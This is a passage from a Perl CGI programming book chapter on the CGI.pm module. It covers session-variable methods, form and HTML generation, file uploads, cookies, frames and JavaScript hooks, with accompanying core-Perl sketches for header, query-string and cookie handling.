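my %SECONDS = (s => 1, m => 60, h => 3600, d => 86400,
               M => 30 * 86400, y => 365 * 86400);

# Format epoch seconds as an HTTP date, for example "Thu, 01 Jan 1970 00:00:00 GMT".
sub http_date {
    my ($epoch) = @_;
    my ($sec, $min, $hour, $mday, $mon, $year, $wday) = gmtime($epoch);
    return sprintf('%s, %02d %s %04d %02d:%02d:%02d GMT',
                   $DAY[$wday], $mday, $MON[$mon], $year + 1900, $hour, $min, $sec);
}

# Turn 'now', '+1h', '-1d', and so on into an HTTP date relative to $now.
# Any other string is assumed to be an explicit date and is returned unchanged.
sub expires_time {
    my ($spec, $now) = @_;
    $now = time unless defined $now;
    return http_date($now) if $spec eq 'now';
    return $spec unless $spec =~ /^([+-]?\d+)([smhdMy])$/;
    return http_date($now + $1 * $SECONDS{$2});
}

# Assemble a CGI response header; the empty line at the end separates it from the body.
sub http_header {
    my (%arg) = @_;
    my @lines;
    push @lines, "Status: $arg{status}"                    if $arg{status};
    push @lines, 'Expires: ' . expires_time($arg{expires}) if $arg{expires};
    push @lines, 'Content-Type: ' . ($arg{type} || 'text/html');
    return join("\r\n", @lines) . "\r\n\r\n";
}

print http_header(type => 'text/html', expires => '+1h');
```

Passing an explicit date string straight through mirrors the last row of the expiration formats, so both relative and absolute dates work with the same parameter.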
HTTP Session Variables
Most of the environment variables that you use in creating CGI programs, including
the ones discussed at the beginning of this chapter, are available through this interface.
A list of methods follows, along with a brief description of each.
- accept()
- This method returns the list of MIME types that the remote client accepts. If
you give this method a MIME type as an argument (for example, $cgi->accept('image/gif')),
it returns a floating-point value ranging from 0.0 ("Don't want it") to
1.0 ("Okay, I'll take that") that tells you how much the browser wants that type.
- auth_type()
- If the page is protected by an authentication scheme, the authorization type
is returned. In HTTP/1.0, the only possible type of authentication is "basic".
In HTTP/1.1, this could be either "basic" or "digest". Other
server-specific schemes might be possible; consult your HTTP server's documentation
to be sure.
- raw_cookie()
- This method returns a Netscape magic cookie in its raw state. Typically, you
can perform any cookie manipulation that you might want to do at a higher level via
the cookie() method.
- path_info()
- This method returns any path information that has been appended to your program's
URL in the HTTP request. For example, if your program is invoked
using the path /cgi-bin/programname/some/other/path, then path_info()
returns /some/other/path.
- path_translated()
- This method is the same as path_info(), except that the path information
is translated into a physical pathname, usually by mapping it onto the server's
document root, such as /var/www/htdocs/some/other/path.
- query_string()
- This method returns a query string (the name=value pairs that follow the ? in a
URL) built from the program's current parameters. This information could include
options and arguments that you might use for maintaining state information.
- referer()
- This method returns the URL of the page that linked the user to your program.
- remote_addr()
- This method returns the IP address of the remote host (that is, the client) in
dotted-quad form.
- remote_ident()
- This method returns the identity of the person on the remote host making the
request. This method works only if the remote system has the identd service
running.
- remote_host()
- This method returns the name of the remote host, if it is known. Otherwise, it
returns the IP address.
- remote_user()
- This method returns the name of the user who has been authenticated on your server.
- request_method()
- This method returns the HTTP method used to request your program's URL (for example,
GET, POST, or HEAD).
- script_name()
- This method returns the program name as a partial URL. This method is useful
for programs that reference themselves.
- server_name()
- This method returns the name of the server on which the program is running.
- server_port()
- This method returns the port number that the local Web server is using.
- user_agent()
- This method returns the remote user's client software identification. You might
be interested in watching this response to see how many browsers claim to be Mozilla
(Netscape Navigator).
- user_name()
- This method returns the remote user's name. This method typically doesn't work,
although it does work on some older browsers such as early versions of NCSA Mosaic.
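Most of these methods report standard CGI environment variables: path_info() corresponds to PATH_INFO, remote_addr() to REMOTE_ADDR, user_agent() to HTTP_USER_AGENT, and so on. The following core-Perl sketch reads a few of them straight from %ENV and shows how a quality value like the one accept() returns can be derived from the client's Accept header. The names request_info() and accept_quality() are hypothetical, and the wildcard rule (an exact type outranks type/*, which outranks */*) follows HTTP content negotiation; CGI.pm's own calculation may differ in detail.

```perl
use strict;
use warnings;

# A few request details read directly from the CGI environment variables
# behind methods such as request_method(), path_info(), and remote_addr().
sub request_info {
    my %var = (method      => 'REQUEST_METHOD',
               script_name => 'SCRIPT_NAME',
               path_info   => 'PATH_INFO',
               remote_addr => 'REMOTE_ADDR',
               user_agent  => 'HTTP_USER_AGENT');
    my %info;
    for my $key (keys %var) {
        $info{$key} = defined $ENV{ $var{$key} } ? $ENV{ $var{$key} } : '';
    }
    return \%info;
}

# Quality (0 to 1) that an Accept header gives a MIME type.
# An exact match beats type/*, which beats */*; 0 means "not accepted".
sub accept_quality {
    my ($type, $accept) = @_;
    $accept = defined $ENV{HTTP_ACCEPT} ? $ENV{HTTP_ACCEPT} : '' unless defined $accept;
    my ($major) = split m{/}, $type;
    my %found;    # rank => quality, where 3 = exact, 2 = type/*, 1 = */*
    for my $entry (split /\s*,\s*/, $accept) {
        my ($range, @params) = split /\s*;\s*/, $entry;
        next unless defined $range;
        my $q = 1;
        for my $param (@params) {
            $q = $1 if $param =~ /^q=([0-9.]+)$/;
        }
        my $rank = $range eq $type      ? 3
                 : $range eq "$major/*" ? 2
                 : $range eq '*/*'      ? 1
                 :                        0;
        $found{$rank} = $q if $rank && !exists $found{$rank};
    }
    for my $rank (3, 2, 1) {
        return $found{$rank} if exists $found{$rank};
    }
    return 0;
}

my $example_accept = 'text/html, image/*;q=0.5, */*;q=0.1';
print 'image/gif: ', accept_quality('image/gif', $example_accept), "\n";   # image/gif: 0.5
```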
HTML from CGI.pm
Now you're ready to look at some useful parameters of the start_html() method, which
creates the HTML header and the beginning of the HTML document itself:
- -title
- This parameter indicates the title of the document. (The argument to this parameter
ends up between the <TITLE> and </TITLE> tags.)
- -author
- This parameter indicates the author's e-mail address.
- -script
- You use this parameter to incorporate JavaScript into your HTML. Here you need
to define all the JavaScript functions that you intend to call when events occur
(such as the submission of a form, the changing of contents of a field, and
so on). You learn how to invoke the functions defined here in the section on JavaScript.
- CGI.pm doesn't write the JavaScript for you; it simply provides a way
for you to incorporate JavaScript into your dynamically generated HTML. To use it,
you need to know JavaScript. Consider this example:
use CGI;
$cgi = new CGI;
print $cgi->header;
$JAVASCRIPT=<<END;
// This is a super simple example of incorporating JavaScript in a
// dynamically generated HTML page.
window.alert("Click on OK!");
END
print $cgi->start_html( -title  => 'Some sort of silliness',
                        -script => $JAVASCRIPT);
print $cgi->end_html;
Unpaired HTML Tags
You create tags that are unpaired such as <BR>, <HR>,
and <P> as follows:
print $cgi->p;
Paired HTML Tags
Other tags, such as <I> and <B>, are paired. You
create them like this:
print $cgi->i("Here is some text to be italicized.");
You can even embed tags within tags. The inner call is not printed; its result is
passed as an argument to the outer call:
print $cgi->i("Here is some", $cgi->b("bold text"), "to be italicized");
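Why nesting works only when the inner call returns its string (rather than printing it) is easier to see with two tiny stand-in functions in core Perl. italic(), bold(), and paired_tag() are hypothetical helpers written for this sketch, and joining the arguments with a single space is an assumption about the output format; the point is only that each function returns a string.

```perl
use strict;
use warnings;

# Hypothetical stand-ins for CGI.pm's i() and b(). Each one RETURNS its
# HTML as a string instead of printing it; that is what lets calls nest.
sub paired_tag {
    my ($tag, @content) = @_;
    return "<$tag>" . join(' ', @content) . "</$tag>";
}
sub italic { return paired_tag('I', @_) }
sub bold   { return paired_tag('B', @_) }

# The inner call runs first and its string becomes one argument of the outer
# call; only the finished string is printed.
my $html = italic('Here is some', bold('bold text'), 'to be italicized');
print "$html\n";    # <I>Here is some <B>bold text</B> to be italicized</I>
```

Had bold() printed its markup, the bold text would appear on the page before the italic text, and the outer call would receive print's return value (1) instead of the markup.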
Some Pitfalls to Avoid
Although you can use almost any of the HTML tags that you might expect via lowercase
function calls of the same name, in some cases they conflict with other methods in
the current namespace.
You might want to make a <TR> tag, for example, but tr()
already exists in Perl as a character translator. You therefore can use TR()
to generate the <TR> tag. Also, you make the <PARAM>
tag via the PARAM() method because param() is a method of the CGI
module itself.
HTML Fill-Out Forms
Remember, the methods for creating forms return the necessary HTML-marked-up text
to make the browser display what you want. You still need to print the strings after
you get them from the methods. Also, the default values that you specify for a form
are valid only the first time that the program is invoked. If you're passing any
values via the query string, the program uses them, even if the values are blank.
You can use the param() method to set a field's value specifically if
you want to do so. (You might want to use this method to ignore what might be in
the query string and set it to another value you want.) If you want to force the
program to use its default value for a given field, you can do so by using the -override
parameter.
So, this bit of code:
print $cgi->textfield(-name => 'browser',
-default => 'Mozilla');
uses the value Mozilla in the browser text field the first time it's invoked.
However, if the query string includes browser=InternetExploder, then the
text field uses this value instead.
To prevent this situation from happening, you can change your CGI to look like
this:
print $cgi->textfield( -name => 'browser',
-default => 'Mozilla',
-override => 1);
Now, the text field always has the default value of Mozilla, regardless of the
value in the query string.
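The rule for choosing a field's initial value can be modeled in a few lines of core Perl. field_value() is a hypothetical helper, and the hash stands in for an already-parsed query string; CGI.pm's internal logic is more involved, but this sketch follows the behavior described above for the browser field.

```perl
use strict;
use warnings;

# Simplified model of how a form field picks its value: a value that arrived
# in the query string wins (even if it is blank); otherwise the default is
# used; an override flag forces the default no matter what was submitted.
sub field_value {
    my ($query, $name, $default, $override) = @_;
    return $default if $override;
    return exists $query->{$name} ? $query->{$name} : $default;
}

# Hypothetical parsed query string: browser=InternetExploder&email=
my %query = (browser => 'InternetExploder', email => '');

print field_value(\%query, 'browser', 'Mozilla'), "\n";       # InternetExploder
print field_value(\%query, 'browser', 'Mozilla', 1), "\n";    # Mozilla
print field_value(\%query, 'email', 'me@example.com'), "\n";  # empty line: a blank value still wins
```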
If you want to force defaults for all fields on the page without having to specifically
tell each one to override values from the query string, you can use the defaults()
method to create a defaults button, or you can construct your program in such a way
that it never passes a query string back to itself.
Although you can put more than one form on a page, keeping track of more than
one at a time isn't easy.
Text that you pass to form elements is escaped. You therefore can use <my@email.addr>,
for example, without worrying that the browser will mistake it for a strange tag.
If you need to turn off this feature (so that you can use HTML entities such as
&copy; for the © symbol), you can do so this way:
$cgi->autoEscape(undef);
To turn the feature back on, try the following:
$cgi->autoEscape('yes');
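Escaping amounts to replacing the few characters that HTML treats specially with entity references. A core-Perl sketch follows; escape_html() is a hypothetical name (CGI.pm provides its own escapeHTML() function for this job), and the exact set of characters CGI.pm escapes may differ slightly.

```perl
use strict;
use warnings;

# Replace the characters HTML treats specially, so text such as
# <my@email.addr> is displayed literally instead of being read as a tag.
sub escape_html {
    my ($text) = @_;
    $text =~ s/&/&amp;/g;    # must come first, or the entities below would be re-escaped
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    $text =~ s/"/&quot;/g;
    return $text;
}

print escape_html('<my@email.addr>'), "\n";   # &lt;my@email.addr&gt;
print escape_html('&copy; 1997'), "\n";       # &amp;copy; 1997
```

The second line shows why escaping must be turned off to use an entity such as &copy;: with escaping on, the browser displays the literal text "&copy;" instead of the symbol.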
<ISINDEX>
To create an <ISINDEX> tag, you can use the isindex()
method as follows:
print $cgi->isindex($action);
Starting and Ending Forms
The startform() and endform() methods (also available as start_form() and end_form())
exist so that you can start and end forms as follows:
print $cgi->startform($method, $action, $encoding);
print $cgi->endform;
Two types of encoding are available:
- application/x-www-form-urlencoded
- This approach is the standard way of submitting data to a server-based form.
- multipart/form-data
- You can use this new encoding option, introduced in Netscape 2.0, to send large
files to the server. It's useful for Netscape's file upload feature within forms.
You really don't need to use this encoding method if you're not going to use the
file upload feature of browsers.
Additionally, you can use JavaScript in your forms by passing the -name
and -onSubmit parameters. (A good use of this feature is validation of form
data before submission to the server.) The JavaScript code given to -onSubmit
should return true to let the submission proceed; a false return value aborts it.
Creating a Text Field
The textfield() method, shown here, returns a single-line text input
field. -name is the name of the field, -default is the default
value for the field, -size is the size of the field in characters, and -maxlength
is the maximum number of characters that can be put into the field.
print $cgi->textfield( -name => 'hours',
-default => 40,
-size => 3,
-maxlength => 4);
Creating a Multi-Line Text Area
You can create a multi-line text area as follows:
print $cgi->textarea( -name => 'comments',
-default => 'My, what great stuff you have!',
-rows => 5,
-columns => 50);
Password Field
password_field() is the same as textfield(), except that asterisks
appear in place of the user's actual keystrokes.
File Upload Field
The following method returns a form field that prompts the user to upload a file
to the Web server:
print $cgi->filefield( -name      => 'uploaded_file',
                       -default   => 'Some value',
                       -size      => 50,
                       -maxlength => 80);
-name is required for the field, -default is the starting value,
-size is the size of the field in characters, and -maxlength is
the maximum number of characters that the filename field accepts (it does not
limit the size of the uploaded file).
You should use the multipart form encoding for uploading files. You can do so
by using the start_multipart_form() method or by specifying $CGI::MULTIPART
as the encoding type. If multipart encoding is not selected, the name of the file
that the user selected for upload is available, but its contents are not.
Remember, you can use the param() method to get the name of the file.
Conveniently, the filename returned is also a file handle. As a result, you can read
the contents of a file that the user uploaded with code like the following:
$uploaded_file = $cgi->param('uploaded_file');
while(<$uploaded_file>) {
print;
}
Binary data isn't too happy with this kind of while loop, though. In fact, if you
want to save the user-uploaded file someplace, as you would if the user were uploading,
for example, a JPEG image of a new car, you might do so with some code like this:
open(NEWFILE, ">/some/path/to/a/file") || die "Cannot open NEWFILE: $!\n";
binmode(NEWFILE);    # write the bytes exactly as received
while ($bytesread = read($uploaded_file, $buffer, 1024)) {
    print NEWFILE $buffer;
}
close NEWFILE;
Pop-Up Menus
You can use the popup_menu() method to create a menu. -name
is the menu's name (required), and -values (required) is an array reference containing
the menu's list items; you can pass either an anonymous array or a reference to a
named array, such as \@menu_items. -default is the name of the default menu choice
(optional). -labels lets you pass an associative array reference that maps each
value to the label the user sees. If it is unspecified, the values from -values are
visible to the user (optional).
print $cgi->popup_menu( -name =>'menu_name',
-values =>['one', 'two', 'three'],
-default =>'three',
-labels =>{'one'=>'first','two'=>'second',
'three'=>'third'});
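To see how -values, -default, and -labels end up in the page, here is a core-Perl sketch that builds comparable <SELECT> markup by hand. popup_html() is a hypothetical helper, the uppercase tags simply mirror this chapter's style, and HTML escaping is left out for brevity; CGI.pm's actual output differs in detail.

```perl
use strict;
use warnings;

# Build <SELECT> markup from the same data popup_menu() takes: a list of
# values, an optional default, and an optional value-to-label map.
# HTML escaping is omitted to keep the sketch short.
sub popup_html {
    my ($name, $values, $default, $labels) = @_;
    $labels ||= {};
    my $html = qq{<SELECT NAME="$name">\n};
    for my $value (@$values) {
        # Show the label if one was given, otherwise the value itself.
        my $label    = exists $labels->{$value} ? $labels->{$value} : $value;
        my $selected = (defined $default && $value eq $default) ? ' SELECTED' : '';
        $html .= qq{<OPTION$selected VALUE="$value">$label\n};
    }
    return $html . "</SELECT>\n";
}

print popup_html('menu_name', ['one', 'two', 'three'], 'three',
                 {one => 'first', two => 'second', three => 'third'});
```

The value is what your program receives when the form is submitted; the label is only what the user sees.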
Scrolling Lists
The method for creating scrolling lists is, of course, scrolling_list():
print $cgi->scrolling_list( -name=>'list_name',
                            -values=>['one', 'two', 'three'],
                            -default=>['one', 'three'],
                            -size=>4,
                            -multiple=>'true',
                            -labels=>\%labels);
-name and -values are the same as they are in pop-up menus.
All other parameters are optional. -default is a list of items (or single
item) to be selected by default. -size is the display size of the list.
-multiple, when set to true, allows multiple selections. Otherwise, only
one item can be selected at a time. -labels is the same as it is for pop-up
menus.
Check Boxes
You use the checkbox() method to create standalone check boxes. If you
have a group of check boxes that are logically linked together, you can use checkbox_group().
print $cgi->checkbox( -name=>'checkbox_name',
-checked=>'checked',
-value=>'ON',
-label=>'Check me!');
-name is a parameter containing the name of the check box; it is the
only required parameter. The check box's name is also used as a readable label next
to the check box itself, unless -label specifies otherwise. -checked
is set to checked if it is to be checked by default. -value specifies the
value of the check box when checked. -label specifies what should appear
next to the check box.
Check Box Groups
checkbox_group(), shown here, is the method you use to create a number
of check boxes that are logically linked together: they share a single name, so the
values of all the boxes that are checked are returned together under that name.
print $cgi->checkbox_group( -name=>'group_name',
                            -values=>['uno', 'dos', 'tres'],
                            -default=>'dos',
                            -linebreak=>'true',
                            -labels=>\%labels);
-name and -values, which are required, function just as they
do for pop-up menus. All other parameters are optional. -default
is either a reference to a list of values or the name of a single value to be checked
by default. If -linebreak is set to true, line breaks are placed between the check
boxes, making them appear in a vertical list. Otherwise, they are listed right next
to each other on the same line. -labels is a reference to an associative array of
labels for each value, just as in pop-up menus. If -nolabels is specified, no labels
are printed next to the buttons.
If you want to generate an HTML 3 table with your check boxes in it, you can do
so by using the -rows and -columns parameters. If these parameters
are set, all the check boxes in the group are put into an HTML 3 table that uses the
number of rows and columns specified. If you like, you can omit -rows, and
the correct number is calculated for you (based on the value you specify in -columns).
Additionally, you can use the -rowheaders and -colheaders parameters
to add headings to your rows and columns. Both of these parameters expect
a reference to an array of headings. They are purely decorative; they don't change
how your check boxes are interpreted.
print $cgi->checkbox_group( -name=>'group_name',
-values=>['sun', 'sgi', 'ibm', 'dec'],
-rows=>2, -columns=>2);
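The row calculation mentioned above is simple arithmetic: with N values and C columns, you need ceil(N / C) rows. A core-Perl sketch follows; grid() is a hypothetical helper that only computes the layout (it generates no HTML), and filling the table column by column is an arbitrary choice that may not match CGI.pm's ordering.

```perl
use strict;
use warnings;

# With only -columns given, the row count follows from the number of values:
# rows = ceil(values / columns), computed here with integer arithmetic.
# Values are placed column by column (an arbitrary choice for this sketch).
sub grid {
    my ($values, $columns) = @_;
    my $rows = int((@$values + $columns - 1) / $columns);
    my @grid;
    for my $i (0 .. $#$values) {
        $grid[ $i % $rows ][ int($i / $rows) ] = $values->[$i];
    }
    return ($rows, \@grid);
}

my ($rows, $grid) = grid(['sun', 'sgi', 'ibm', 'dec'], 2);
print "$rows rows\n";                      # 2 rows
print join("\t", @$_), "\n" for @$grid;    # prints "sun<TAB>ibm", then "sgi<TAB>dec"
```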
Radio Button Groups
You use the radio_group() method to create logical groups of radio buttons.
Turning on one button in a radio group turns off all the others. As a result, -default
accepts only a single value (instead of a list, as it can with check box groups).
Otherwise, the parameters for radio button groups are the same as for check box groups.
Submit Buttons
Forms are pretty useless unless you can submit them. So, the CGI module provides
the submit() method, which is shown here. Available parameters are -name
and -value. -name associates a name with a specific button. (This
capability is useful when you have multiple buttons on the same page and want to
differentiate them.) -value is what is passed to your program in the query
string, and also appears as a label for the submit button. Both parameters are optional.
print $cgi->submit( -name=>'button_name',
-value=>'value');
Reset Buttons
Reset buttons are straightforward: clicking the reset button undoes whatever changes
the user has made to the form and presents a fresh one for mangling.
print $cgi->reset;
Defaults Buttons
The defaults() method, shown here, resets a form to its defaults. This
method is different from reset(), which just undoes whatever changes the
user has made by typing in the fields. Reset buttons do not override query strings,
but defaults buttons do. This difference between the two is small but important.
If an argument is given, it is used as the label for the button. Otherwise, the button
is labeled Defaults.
print $cgi->defaults('button_label');
Hidden Fields
The hidden() method, shown here, produces a text field that's invisible
to the user. This capability is useful for passing form data from one form to another,
when you don't want to clutter up the screen with information that the user doesn't
need to see every time.
print $cgi->hidden( -name=>'field_name',
-default=>['value1', 'value2', 'value3']);
Both parameters must be given. As in other cases, the second can be
an anonymous array or a reference to a named array.
Clickable Image Buttons
So you aren't satisfied to have plain old hypertext as your link? Want to
use an image instead? Then use the image_button() method as follows:
print $cgi->image_button( -name=>'button_name',
                          -src=>'clickMe.gif',
                          -align=>'middle',
                          -alt=>'Click Me!');
When you use image_button(), only -name and -src are
required. When the image is clicked, not only is the form submitted, but the x
and y coordinates indicating where the image was clicked are also submitted
via two parameters: button_name.x and button_name.y.
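A click on an image button reaches your program as ordinary name/value pairs, so any query-string parser can pick out the coordinates; in practice, CGI.pm's param('button_name.x') does this for you. Here is a minimal core-Perl parser to show what happens underneath. parse_query() and url_decode() are hypothetical helpers, not CGI.pm functions; they keep every value for a repeated name, which also covers hidden fields and check box groups that submit several values.

```perl
use strict;
use warnings;

# Decode one URL-encoded component: '+' stands for a space, %XX for a byte.
sub url_decode {
    my ($s) = @_;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $s;
}

# Parse a query string into name => [values]. Pairs are separated by & (or ;),
# and a name that appears more than once collects all of its values.
sub parse_query {
    my ($qs) = @_;
    my %param;
    for my $pair (split /[&;]/, $qs) {
        next unless length $pair;
        my ($name, $value) = split /=/, $pair, 2;
        $value = '' unless defined $value;
        push @{ $param{ url_decode($name) } }, url_decode($value);
    }
    return \%param;
}

# An image button named button_name adds button_name.x and button_name.y.
my $param = parse_query('button_name.x=17&button_name.y=42');
my ($x, $y) = ($param->{'button_name.x'}[0], $param->{'button_name.y'}[0]);
print "clicked at ($x, $y)\n";    # clicked at (17, 42)
```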
JavaScript Buttons
button(), shown here, creates a JavaScript button: when the user clicks it, the
JavaScript code given in -onClick is executed. Note that this method doesn't work
at all if the browser doesn't understand JavaScript, if the browser has this feature
turned off, or if the browser is behind a firewall that filters out JavaScript.
print $cgi->button( -name=>'big_red_button',
-value=>'Click Me!',
-onClick=>'doButton(this)');
Additional Considerations
Sometimes using Perl's print statement to send straight HTML to the client is
just better. An example might be when you're implementing a table that contains information
read from a file. It's probably better to use print to open the <TABLE>
tag, use the methods to return the contents of the table, and then another print
to close the table. Doing absolutely everything from a CGI method might be preferred
by an object purist, but in practice, sometimes sticking a print statement with raw
HTML in your program just makes more sense (from the standpoints of simplicity and
readability).
Because the CGI modules are continually being enhanced, be sure to check the CGI.pm
documentation for the complete list of methods, parameters, and features. You can
find the documentation on the Web at
http://www.genome.wi.mit.edu/ftp/pub/software/WWW/cgi_docs.html
Netscape Cookies
Using cookies is another way to maintain state information. A cookie is simply
a bit of data that contains a number of name/value pairs passed between the client
and the server in the HTTP header rather than in the query string. In addition to
name/value pairs, several other optional attributes exist.
The following is a sample cookie that demonstrates how to use the cookie() method:
$my_cookie = $cgi->cookie( -name=>'myBigCookie',
-value=>'chocolate chip',
-expires=>'+5y',
-path=>'/cgi-bin',
-domain=>'.example.com',
-secure=>1);
print $cgi->header(-cookie=>$my_cookie);
The cookie() method creates a new cookie. Its parameters are as follows:
- -name
- This required parameter identifies the cookie.
- -value
- This parameter indicates the cookie's value. It can be a scalar value, array
reference, or associative array reference.
- -path
- This parameter indicates the partial path in which the cookie is valid.
- -domain
- This parameter indicates the partial domain for which the cookie is valid.
- -expires
- This parameter indicates the expiration date for the cookie. The format is the
same as described in the HTTP headers section.
- -secure
- If this parameter is set to 1, the cookie is used only in an SSL session.
- Cookies created with the cookie() method must be sent in the HTTP header
via the header() method as follows:
print $cgi->header(-cookie=>$my_cookie);
You can send multiple cookies by passing an array reference to header(),
naming each cookie to be sent:
print $cgi->header(-cookie=>[$cookie1, $cookie2]);
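Underneath, each cookie is a single Set-Cookie header line, and sending two cookies simply means sending two such lines. The following core-Perl sketch builds one from the same attributes cookie() accepts. set_cookie(), cookie_escape(), and cookie_date() are hypothetical helpers; to keep the sketch short, expires is given as an absolute time in epoch seconds rather than a relative string such as '+5y', and the date layout follows the original Netscape cookie format.

```perl
use strict;
use warnings;

my @DAY = qw(Sun Mon Tue Wed Thu Fri Sat);
my @MON = qw(Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec);

# Netscape-style cookie date: Wdy, DD-Mon-YYYY HH:MM:SS GMT
sub cookie_date {
    my ($epoch) = @_;
    my ($sec, $min, $hour, $mday, $mon, $year, $wday) = gmtime($epoch);
    return sprintf('%s, %02d-%s-%04d %02d:%02d:%02d GMT',
                   $DAY[$wday], $mday, $MON[$mon], $year + 1900, $hour, $min, $sec);
}

# URL-encode anything that is not safe inside a cookie name or value.
sub cookie_escape {
    my ($s) = @_;
    $s =~ s/([^A-Za-z0-9_.~-])/sprintf('%%%02X', ord($1))/ge;
    return $s;
}

# Build one Set-Cookie line. In this sketch, expires is epoch seconds.
sub set_cookie {
    my (%c) = @_;
    my $line = 'Set-Cookie: ' . cookie_escape($c{name}) . '=' . cookie_escape($c{value});
    $line .= '; path='    . $c{path}                 if $c{path};
    $line .= '; domain='  . $c{domain}               if $c{domain};
    $line .= '; expires=' . cookie_date($c{expires}) if defined $c{expires};
    $line .= '; secure'                              if $c{secure};
    return $line;
}

# Two cookies are simply two Set-Cookie lines in the same header block.
print set_cookie(name => 'myBigCookie', value => 'chocolate chip',
                 path => '/cgi-bin', domain => '.example.com', secure => 1), "\r\n";
print set_cookie(name => 'flavor', value => 'oatmeal'), "\r\n";
```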
To retrieve a cookie, you can request it by name using the cookie() method without
the -value parameter:
use CGI;
$cgi = new CGI;
$stuff = $cgi->cookie(-name=>'stuff');
To delete a cookie, send a blank cookie with the same name as the one you want
to delete, and set its expiration date to something in the past.
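On the way back, the browser sends all applicable cookies in a single Cookie header, which the server hands to your program as HTTP_COOKIE. Here is a core-Perl sketch of reading that variable and of the deletion trick just described. read_cookies(), cookie_unescape(), and delete_cookie() are hypothetical helpers, and the past date used for deletion is arbitrary (any date in the past works).

```perl
use strict;
use warnings;

# Decode %XX escapes in a cookie name or value.
sub cookie_unescape {
    my ($s) = @_;
    $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $s;
}

# The browser returns cookies in one header, exposed as HTTP_COOKIE:
# "name1=value1; name2=value2"
sub read_cookies {
    my ($header) = @_;
    $header = defined $ENV{HTTP_COOKIE} ? $ENV{HTTP_COOKIE} : '' unless defined $header;
    my %cookie;
    for my $pair (split /;\s*/, $header) {
        my ($name, $value) = split /=/, $pair, 2;
        next unless defined $name && length $name;
        $cookie{ cookie_unescape($name) } = cookie_unescape(defined $value ? $value : '');
    }
    return \%cookie;
}

# Deleting a cookie: resend it with an empty value and a past expiration date.
# The path (and domain, if one was used) must match the original cookie.
sub delete_cookie {
    my ($name, $path) = @_;
    return "Set-Cookie: $name=; path=$path; expires=Thu, 01-Jan-1970 00:00:00 GMT";
}

my $cookies = read_cookies('stuff=chocolate%20chip; flavor=oatmeal');
print "$cookies->{stuff}\n";    # chocolate chip
print delete_cookie('stuff', '/cgi-bin'), "\r\n";
```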
Note that cookies have some limitations. The original Netscape cookie specification
requires a client to store only 300 cookies in total, 4 kilobytes per cookie (name
and value combined), and 20 cookies per server or domain, so don't count on a client
storing more than that.
Netscape Frames
You can support frames from within CGI.pm in two ways:
- Direct the output of a program into a frame with the specified name, as follows.
If the named frame doesn't exist, a new window pops up with the program's output in
it.
$cgi = new CGI;
print $cgi->header(-target=>'_myFrame');
- Provide the frame's name as an argument to the -target parameter using the start_form()
method:
print $cgi->start_form(-target=>'another_frame');
- Because using frames well can be difficult, splitting the program into logical
sections is often best. For example, if a page has multiple frames, making one part
of the program create the frames and having a separate section of the program handle
each frame might be best.
JavaScript
JavaScript is a useful interpreted language that runs inside the browser. It was
introduced in Netscape version 2 as "LiveScript," but its name was almost
immediately changed to JavaScript, and it was made to look similar to Java. Having
code execute on the client side is nice, especially for CGI purposes, because you
can perform tasks such as form validation on the client side, shifting
user-interface-oriented processing to the client (where it belongs) rather
than your server (where it doesn't).
Again, using the JavaScript features of CGI.pm requires that you know JavaScript.
JavaScript events are available only in cases in which they are applicable.
To register a JavaScript event handler with an HTML element, simply name the appropriate
parameter, and pass it any arguments you need when calling the CGI method. For example,
if you want to have a text field's contents be validated as soon as a user makes
a change to it, you can do so this way:
print $cgi->textfield( -name=>'height',
                       -onChange=>"validateHeight(this)");
Of course, for this approach to work, validateHeight() must be an existing
function. You define it in a <SCRIPT> block by passing its code through the -script
parameter of the start_html() method.
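The two pieces have to agree: the name used in -onChange must match a function defined in the page's script block. The following core-Perl sketch writes out by hand roughly the page that start_html() with -script plus textfield() with -onChange would produce. The markup CGI.pm generates differs in detail, and the body of validateHeight() (a simple numeric check) is invented for this example.

```perl
use strict;
use warnings;

# The function named in onChange must be defined in the page's <SCRIPT> block.
# This validateHeight() body is a hypothetical example check.
my $javascript = <<'END';
function validateHeight(field) {
    if (isNaN(parseFloat(field.value))) {
        alert("Please enter a number for your height.");
        field.focus();
        return false;
    }
    return true;
}
END

# Hand-written equivalent of the header, start_html(), and textfield() output.
sub page {
    return "Content-Type: text/html\r\n\r\n"
         . "<HTML><HEAD><TITLE>Height</TITLE>\n"
         . "<SCRIPT LANGUAGE=\"JavaScript\">\n$javascript</SCRIPT>\n"
         . "</HEAD><BODY>\n"
         . qq{<INPUT TYPE="text" NAME="height" onChange="validateHeight(this)">\n}
         . "</BODY></HTML>\n";
}

print page();
```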
Summary
Perl is an excellent language for writing CGI applications. Given its flexibility,
speed, portability, and the wealth of CGI-related Perl resources available, there
is very little that can't be done. Perl has been used to develop a great many of the
CGI programs on the Web, and after seeing how well Perl does the job, it's easy to see
why.
CGI programming is a powerful and fun way to accomplish many of the tasks relating
to allowing users to interact with huge amounts of data. Information can be as dynamic
or as static as you like.
As the Web becomes closer to the long-sought dream of an easy-to-use, ubiquitous
user interface, it makes more sense to use CGI to look at data than to use the
proprietary interfaces that typically exist. Because a CGI program runs on your server,
though, it typically has access to data that you might not want to give to everyone.
(For example, a corporate network might have a CGI interface to a certain subset
of an employee database, which might also include information such as payroll, Social
Security numbers, and so on that shouldn't be "public" knowledge.) Therefore,
you need to take some precautions related to security, just to make sure that your
program won't be tricked into giving out sensitive information that it otherwise
wouldn't give.
The Perl community is one of the most helpful on the Net. Regardless of whether
you're just learning to program or are already a wizard, a plethora of people on
the comp.lang.perl.* newsgroups are willing to help you solve any problems
that you're confronted with. (They won't write the programs for you, for the most
part, but they'll do more than that: they'll help you figure out how to solve your
own problems. So the next time, you won't have to ask anyone.) Do your part to keep
the community the way it is: When you see that someone is asking a question, and you
can provide some help, do so. If you've written a useful module, share it.
Because of Perl's powerful regular expressions, object-oriented capabilities,
and the huge library of free Perl modules to handle interfaces to various databases,
CGI, encryption systems, and so on, Perl is a great language for safe and powerful
CGI programming.
©Copyright,
Macmillan Computer Publishing. All rights reserved.